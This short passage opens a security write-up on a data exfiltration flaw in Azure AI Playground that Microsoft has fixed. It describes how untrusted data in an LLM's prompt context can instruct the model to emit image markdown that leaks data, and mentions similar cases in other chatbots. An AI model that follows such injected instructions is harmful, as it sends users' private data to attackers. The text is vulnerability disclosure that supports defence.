Microsoft Fixes Data Exfiltration Vulnerability in Azure AI Playground
Large Language Model (LLM) applications and chatbots are quite commonly vulnerable to data exfiltration. In particular data exfiltration via Image Markdown Injection is quite frequent.
Microsoft fixed such a vulnerability in Bing Chat, Anthropic fixed it in Claude, and ChatGPT has a known vulnerability as Open AI “won’t fix” the issue.
This post describes a variant in the Azure AI Playground and how Microsoft fixed it.
From Untrusted Data to Data Exfiltration When untrusted data makes it into the LLM prompt context it can instruct the model to inject an image markdown element.